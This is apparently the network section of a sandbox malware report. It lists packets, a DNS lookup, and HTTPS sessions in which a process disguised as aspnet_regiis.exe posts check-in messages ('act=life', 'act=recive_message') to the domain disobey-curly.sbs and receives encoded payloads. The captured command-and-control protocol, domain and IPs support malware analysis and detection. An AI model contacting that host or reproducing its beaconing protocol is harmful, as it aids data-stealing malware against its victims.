                                                                      Nov 23, 2024 14:59:54.026583910 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:54.026741028 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:54.026802063 CET49732443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:54.026880026 CET49732443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:54.026894093 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:54.026905060 CET49732443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:54.026910067 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:54.150799036 CET49734443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:54.150846004 CET44349734172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:54.150913000 CET49734443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:54.151232004 CET49734443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:54.151242971 CET44349734172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:55.416635990 CET44349734172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:55.416704893 CET49734443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:55.419068098 CET49734443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:55.419079065 CET44349734172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:55.419413090 CET44349734172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:55.430583000 CET49734443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:55.430748940 CET49734443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:55.430809021 CET44349734172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:55.430872917 CET49734443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:55.430885077 CET44349734172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:56.378020048 CET44349734172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:56.378278971 CET44349734172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:56.378336906 CET49734443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:56.406702995 CET49734443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:56.406728029 CET44349734172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:56.595885992 CET49737443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:56.595974922 CET44349737172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:56.596055031 CET49737443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:56.596456051 CET49737443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:56.596488953 CET44349737172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:57.908463955 CET44349737172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:57.908704996 CET49737443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:57.909835100 CET49737443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:57.909878969 CET44349737172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:57.910238981 CET44349737172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:57.911567926 CET49737443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:57.911698103 CET49737443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:57.911762953 CET44349737172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:58.742918968 CET44349737172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:58.743037939 CET44349737172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:58.743113041 CET49737443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:58.743185997 CET49737443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:58.743208885 CET44349737172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:58.935203075 CET49739443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:58.935241938 CET44349739172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:58.935424089 CET49739443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:58.935604095 CET49739443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:58.935616016 CET44349739172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:00.236732960 CET44349739172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:00.236881018 CET49739443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:00.238091946 CET49739443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:00.238125086 CET44349739172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:00.238485098 CET44349739172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:00.265609026 CET49739443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:00.265733004 CET49739443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:00.265877962 CET44349739172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:00.266115904 CET49739443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:00.266132116 CET44349739172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:01.120598078 CET44349739172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:01.120728970 CET44349739172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:01.120789051 CET49739443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:01.148825884 CET49739443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:01.148850918 CET44349739172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:01.452074051 CET49741443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:01.452138901 CET44349741172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:01.452202082 CET49741443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:01.452953100 CET49741443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:01.452966928 CET44349741172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:02.720088005 CET44349741172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:02.720211983 CET49741443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:02.721468925 CET49741443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:02.721481085 CET44349741172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:02.721795082 CET44349741172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:02.731533051 CET49741443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:02.731623888 CET49741443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:02.731631994 CET44349741172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:03.426990032 CET44349741172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:03.427201986 CET49741443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:03.427225113 CET44349741172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:03.427269936 CET49741443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:03.848350048 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:03.848397017 CET44349742172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:03.848469019 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:03.848869085 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:03.848884106 CET44349742172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:05.069894075 CET44349742172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:05.070020914 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:05.073793888 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:05.073827982 CET44349742172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:05.074930906 CET44349742172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:05.076245070 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:05.076945066 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:05.077017069 CET44349742172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:05.077171087 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:05.077230930 CET44349742172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:05.078072071 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:05.078154087 CET44349742172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:05.078542948 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:05.078591108 CET44349742172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:05.078897953 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:05.078943014 CET44349742172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:05.079129934 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:05.079168081 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:05.079176903 CET44349742172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:05.079224110 CET44349742172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:05.079458952 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:05.079500914 CET44349742172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:05.079549074 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:05.079652071 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:05.079720020 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:05.127351046 CET44349742172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:05.127574921 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:05.127626896 CET44349742172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:05.127662897 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:05.127697945 CET44349742172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:05.127784967 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:05.127813101 CET44349742172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:08.362394094 CET44349742172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:08.362678051 CET44349742172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:08.362684965 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:08.362732887 CET49742443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:08.372118950 CET49744443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:08.372214079 CET44349744172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:08.372318983 CET49744443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:08.372585058 CET49744443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:08.372617960 CET44349744172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:09.634282112 CET44349744172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:09.634402990 CET49744443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:09.635691881 CET49744443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:09.635721922 CET44349744172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:09.636060953 CET44349744172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:09.637291908 CET49744443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:09.637337923 CET49744443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:09.637382030 CET44349744172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:10.352886915 CET44349744172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:10.353136063 CET44349744172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:10.353225946 CET49744443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:10.353302956 CET49744443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:10.353351116 CET44349744172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 15:00:10.353394985 CET49744443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 15:00:10.353411913 CET44349744172.67.223.140192.168.2.4
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 23, 2024 14:59:49.437251091 CET6045153192.168.2.41.1.1.1
                                                                      Nov 23, 2024 14:59:49.582947016 CET53604511.1.1.1192.168.2.4
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Nov 23, 2024 14:59:49.437251091 CET192.168.2.41.1.1.10xdc04Standard query (0)disobey-curly.sbsA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Nov 23, 2024 14:59:49.582947016 CET1.1.1.1192.168.2.40xdc04No error (0)disobey-curly.sbs172.67.223.140A (IP address)IN (0x0001)false
                                                                      Nov 23, 2024 14:59:49.582947016 CET1.1.1.1192.168.2.40xdc04No error (0)disobey-curly.sbs104.21.70.128A (IP address)IN (0x0001)false
                                                                      • disobey-curly.sbs
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449730172.67.223.1404432196C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 13:59:51 UTC264OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 8
                                                                      Host: disobey-curly.sbs
                                                                      2024-11-23 13:59:51 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                      Data Ascii: act=life
                                                                      2024-11-23 13:59:51 UTC1019INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 13:59:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=1efhp2h7cf8aua1332k912tu81; expires=Wed, 19-Mar-2025 07:46:30 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rQrjeoEJhBRj%2Bkf5qbCHazvR8eyis5U39cjPLZp8X4iZLZOpOQTi%2BOImp359AdLpHzZHO%2FbAM1RI425B6jfwGBCZJPm6SSprrvq6RU5McbbIUaKD1E6GlZrBqreDAB%2F%2BFrfm7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71aea1784272b9-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1937&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=908&delivery_rate=1304736&cwnd=225&unsent_bytes=0&cid=24bb6695569b7a99&ts=973&x=0"
                                                                      2024-11-23 13:59:51 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                      Data Ascii: 2ok
                                                                      2024-11-23 13:59:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.449732172.67.223.1404432196C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-11-23 13:59:53 UTC265OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 49
                                                                      Host: disobey-curly.sbs
                                                                      2024-11-23 13:59:53 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 6c 6f 6e 69 6b 69 72 26 6a 3d
                                                                      Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--lonikir&j=
                                                                      2024-11-23 13:59:53 UTC1016INHTTP/1.1 200 OK
                                                                      Date: Sat, 23 Nov 2024 13:59:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=mgbh8e3av1idoi8oh2391u5h78; expires=Wed, 19-Mar-2025 07:46:32 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T0saM3KBSjdJ4b7Yt0e7i%2FGgYJ8TigoiiI%2FwL59PMKhY76g3uinrsi3ym59WUI4rqYWgZPbDHTMw0PzfPP%2FehG60dWK9b%2FiN9ANWSG7oDQNIwHxnBzCDzrb6BktVDilsa8dFsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e71aeaecf2a78d9-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1981&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=950&delivery_rate=1345622&cwnd=32&unsent_bytes=0&cid=1d35cf33eb9022b4&ts=710&x=0"
                                                                      2024-11-23 13:59:53 UTC353INData Raw: 34 34 36 63 0d 0a 48 76 36 52 6d 59 61 52 70 70 43 61 72 44 53 73 43 7a 41 71 69 69 4b 37 70 2b 4b 31 48 6a 55 53 51 34 35 34 65 7a 35 63 78 34 5a 6c 33 4f 65 37 76 4b 57 4b 73 75 6e 4a 46 70 5a 2f 51 6c 2f 76 44 70 6e 47 68 70 63 6b 55 33 4d 76 2f 52 31 58 48 43 71 71 70 43 53 59 38 50 58 31 39 49 71 79 2f 39 51 57 6c 6c 42 4c 43 4f 39 4d 6d 5a 33 41 30 48 52 58 63 79 2f 73 47 52 42 52 4c 4b 76 6c 64 70 4c 32 38 65 50 79 77 76 48 32 77 56 48 4a 62 6c 46 41 35 45 76 57 7a 34 2b 58 4d 68 64 33 4f 61 78 43 57 58 4d 35 73 2b 64 54 6e 2b 4c 79 70 4f 79 4b 36 37 6a 4a 57 6f 34 78 45 6b 76 76 51 4e 66 42 68 74 35 32 58 58 6f 6e 37 52 77 52 54 6a 57 68 37 6e 61 63 39 66 44 70 2b 39 62 38 2f 4d 5a 61 7a 32 52 52 43 4b 59 41 33 74 33 41 6a 7a 77 45 51 69 4c 39 43
                                                                      Data Ascii: 446cHv6RmYaRppCarDSsCzAqiiK7p+K1HjUSQ454ez5cx4Zl3Oe7vKWKsunJFpZ/Ql/vDpnGhpckU3Mv/R1XHCqqpCSY8PX19Iqy/9QWllBLCO9MmZ3A0HRXcy/sGRBRLKvldpL28ePywvH2wVHJblFA5EvWz4+XMhd3OaxCWXM5s+dTn+LypOyK67jJWo4xEkvvQNfBht52XXon7RwRTjWh7nac9fDp+9b8/MZaz2RRCKYA3t3AjzwEQiL9C
                                                                      2024-11-23 13:59:53 UTC1369INData Raw: 6c 2f 73 54 67 38 4d 56 64 79 33 74 5a 51 65 56 4e 32 63 69 4b 32 48 39 58 64 79 76 6d 46 52 4e 59 4d 36 6a 69 66 4a 79 7a 74 61 54 30 33 4c 4b 67 6a 6e 58 4c 65 56 56 45 2f 67 4c 6a 68 5a 2b 5a 5a 52 64 33 4c 61 78 43 57 56 51 37 70 75 64 33 6b 2f 44 7a 37 2b 48 45 34 50 37 44 55 39 78 76 56 30 62 69 51 38 76 50 6a 74 46 2f 58 6e 73 6f 36 52 30 64 48 48 44 6c 34 32 54 63 71 37 76 46 2f 73 2f 2b 38 74 6c 57 6a 6e 59 63 55 61 68 48 31 59 58 59 6c 33 68 57 64 43 44 6f 46 42 64 59 4d 71 50 71 63 5a 50 31 38 65 54 30 7a 76 72 77 7a 31 76 46 5a 6c 4a 4e 35 55 54 66 79 59 48 53 50 42 6b 77 4a 76 52 61 51 52 77 51 6f 75 64 75 33 73 62 34 36 76 33 44 35 4c 6a 52 47 4e 63 70 56 55 53 6f 47 4a 6e 4c 68 64 68 75 56 6d 49 6b 34 67 67 56 57 54 69 6f 35 33 4b 63 39 76
                                                                      Data Ascii: l/sTg8MVdy3tZQeVN2ciK2H9XdyvmFRNYM6jifJyztaT03LKgjnXLeVVE/gLjhZ+ZZRd3LaxCWVQ7pud3k/Dz7+HE4P7DU9xvV0biQ8vPjtF/Xnso6R0dHHDl42Tcq7vF/s/+8tlWjnYcUahH1YXYl3hWdCDoFBdYMqPqcZP18eT0zvrwz1vFZlJN5UTfyYHSPBkwJvRaQRwQoudu3sb46v3D5LjRGNcpVUSoGJnLhdhuVmIk4ggVWTio53Kc9v
                                                                      2024-11-23 13:59:53 UTC1369INData Raw: 35 4c 6a 52 47 4e 63 70 56 55 53 6f 47 4a 6e 4a 69 64 64 33 58 58 51 68 36 78 63 63 58 7a 6d 6d 36 58 75 57 2f 66 7a 67 2f 38 33 2f 2f 73 35 52 79 6d 78 41 54 65 46 4d 31 59 58 4f 6c 33 74 50 4d 48 6d 73 4e 52 35 4b 50 59 72 6e 62 5a 57 7a 35 4b 72 71 68 50 58 30 6a 67 36 4f 62 6c 64 41 34 30 62 52 78 5a 4c 53 63 6c 78 78 4b 2b 6f 62 46 46 41 34 70 65 56 38 6d 76 2f 37 34 2f 54 57 34 50 33 49 52 4d 51 70 48 41 6a 76 57 4a 6d 64 77 4f 46 73 51 47 45 33 72 69 38 61 55 6a 43 69 38 6a 79 44 76 65 4b 6b 39 4d 69 79 6f 49 35 64 7a 6d 56 56 51 4f 35 45 30 63 71 50 33 6d 35 57 66 43 2f 2b 48 52 6c 56 4d 4b 72 6f 64 5a 48 30 39 75 2f 35 79 66 62 2f 7a 78 61 41 4b 56 56 51 71 42 69 5a 38 35 44 61 63 48 6c 37 4c 65 56 61 42 68 49 6e 35 65 4e 77 33 4b 75 37 34 50 2f
                                                                      Data Ascii: 5LjRGNcpVUSoGJnJidd3XXQh6xccXzmm6XuW/fzg/83//s5RymxATeFM1YXOl3tPMHmsNR5KPYrnbZWz5KrqhPX0jg6ObldA40bRxZLSclxxK+obFFA4peV8mv/74/TW4P3IRMQpHAjvWJmdwOFsQGE3ri8aUjCi8jyDveKk9MiyoI5dzmVVQO5E0cqP3m5WfC/+HRlVMKrodZH09u/5yfb/zxaAKVVQqBiZ85DacHl7LeVaBhIn5eNw3Ku74P/
                                                                      2024-11-23 13:59:53 UTC1369INData Raw: 6c 50 4c 62 56 56 4d 37 6b 2b 5a 69 38 44 51 5a 42 63 6f 59 63 4d 39 4c 42 34 66 6e 36 52 6a 30 75 71 37 34 2f 2b 45 71 72 6a 43 56 63 4a 68 58 55 37 68 54 4e 50 4d 69 39 74 33 55 33 77 6f 36 52 77 59 57 54 75 6b 34 48 43 57 39 66 6a 6e 2f 4d 76 39 38 49 34 59 6a 6d 35 4b 43 4c 41 41 2f 4e 4b 4c 32 58 6f 58 62 32 2f 31 57 68 35 51 66 76 32 6b 63 4a 58 31 2f 65 48 2f 78 66 54 77 79 31 37 4b 61 46 52 4f 36 30 2f 64 77 49 48 59 65 46 74 2b 4b 2b 30 62 46 56 63 78 72 75 45 38 30 72 50 38 2f 4c 4f 63 73 73 6e 4e 51 4e 6c 35 58 67 6a 33 44 73 43 46 68 39 73 38 44 7a 41 67 2f 68 41 54 55 6a 75 71 34 58 2b 54 39 50 62 69 2f 38 37 37 38 4d 68 5a 78 33 74 52 52 4f 5a 48 31 38 6d 4f 32 6e 5a 55 66 57 47 69 57 68 35 45 66 76 32 6b 55 4a 76 2b 31 65 2f 2f 77 37 4c 6e
                                                                      Data Ascii: lPLbVVM7k+Zi8DQZBcoYcM9LB4fn6Rj0uq74/+EqrjCVcJhXU7hTNPMi9t3U3wo6RwYWTuk4HCW9fjn/Mv98I4Yjm5KCLAA/NKL2XoXb2/1Wh5Qfv2kcJX1/eH/xfTwy17KaFRO60/dwIHYeFt+K+0bFVcxruE80rP8/LOcssnNQNl5Xgj3DsCFh9s8DzAg/hATUjuq4X+T9Pbi/8778MhZx3tRROZH18mO2nZUfWGiWh5Efv2kUJv+1e//w7Ln
                                                                      2024-11-23 13:59:53 UTC1369INData Raw: 63 53 54 2f 41 41 67 59 57 32 30 47 78 48 63 32 50 64 44 42 70 4b 4e 61 6a 6f 50 49 4f 39 34 71 54 30 79 4c 4b 67 6a 6c 44 42 59 46 46 48 36 55 6e 56 79 49 58 65 65 56 5a 32 4a 65 59 51 47 56 6f 34 70 4f 46 32 6e 2f 4c 78 37 66 54 4d 39 66 76 63 46 6f 41 70 56 56 43 6f 47 4a 6e 73 68 38 56 79 52 7a 41 2b 6f 67 4e 5a 57 7a 4c 6c 76 44 79 59 2b 66 54 67 39 4d 6a 30 2f 63 68 62 7a 32 5a 54 53 4f 64 45 30 73 79 47 31 6e 46 53 66 53 58 2b 45 42 4a 54 4d 71 7a 6f 63 64 79 39 75 2b 50 72 68 4b 71 34 2f 31 76 41 5a 31 56 65 71 46 2b 58 33 4d 44 51 63 42 63 6f 59 65 30 57 46 6c 38 78 70 75 64 39 6c 75 48 70 36 50 72 4d 39 2f 54 46 57 4d 68 37 56 45 66 68 51 39 72 4d 68 39 39 77 58 58 4d 6d 72 46 52 5a 57 79 62 6c 76 44 79 2f 35 4f 76 70 73 39 75 38 34 59 35 52 77
                                                                      Data Ascii: cST/AAgYW20GxHc2PdDBpKNajoPIO94qT0yLKgjlDBYFFH6UnVyIXeeVZ2JeYQGVo4pOF2n/Lx7fTM9fvcFoApVVCoGJnsh8VyRzA+ogNZWzLlvDyY+fTg9Mj0/chbz2ZTSOdE0syG1nFSfSX+EBJTMqzocdy9u+PrhKq4/1vAZ1VeqF+X3MDQcBcoYe0WFl8xpud9luHp6PrM9/TFWMh7VEfhQ9rMh99wXXMmrFRZWyblvDy/5Ovps9u84Y5Rw
                                                                      2024-11-23 13:59:53 UTC1369INData Raw: 6d 55 74 7a 44 6a 39 68 31 58 6e 51 70 37 78 6f 64 57 44 6d 67 35 33 43 58 39 50 6a 72 39 38 33 38 38 63 45 57 67 43 6c 56 55 4b 67 59 6d 65 53 62 31 48 42 61 4d 44 36 69 41 31 6c 62 4d 75 57 38 50 4a 44 39 2f 75 54 35 77 76 62 39 79 46 7a 4c 61 56 6c 4c 35 30 54 66 77 59 2f 58 64 31 35 78 4a 2b 6b 51 45 6c 6f 7a 70 75 4a 36 33 4c 32 37 34 2b 75 45 71 72 6a 75 54 63 4e 6c 56 51 6a 33 44 73 43 46 68 39 73 38 44 7a 41 71 34 42 34 65 58 44 4f 6d 37 48 6d 59 2b 66 37 6b 2b 39 62 36 2b 4d 6c 45 33 47 6c 62 54 65 52 44 32 63 47 47 33 6e 70 55 64 47 47 69 57 68 35 45 66 76 32 6b 55 5a 44 30 30 75 50 6f 68 4f 32 32 31 78 62 4a 5a 52 49 51 71 45 48 53 7a 34 2f 61 66 31 46 7a 4b 75 6b 51 47 46 73 32 71 50 5a 2f 6b 2f 7a 2f 35 50 7a 43 39 50 6e 42 55 4d 6c 67 55 30
                                                                      Data Ascii: mUtzDj9h1XnQp7xodWDmg53CX9Pjr98388cEWgClVUKgYmeSb1HBaMD6iA1lbMuW8PJD9/uT5wvb9yFzLaVlL50TfwY/Xd15xJ+kQElozpuJ63L274+uEqrjuTcNlVQj3DsCFh9s8DzAq4B4eXDOm7HmY+f7k+9b6+MlE3GlbTeRD2cGG3npUdGGiWh5Efv2kUZD00uPohO221xbJZRIQqEHSz4/af1FzKukQGFs2qPZ/k/z/5PzC9PnBUMlgU0
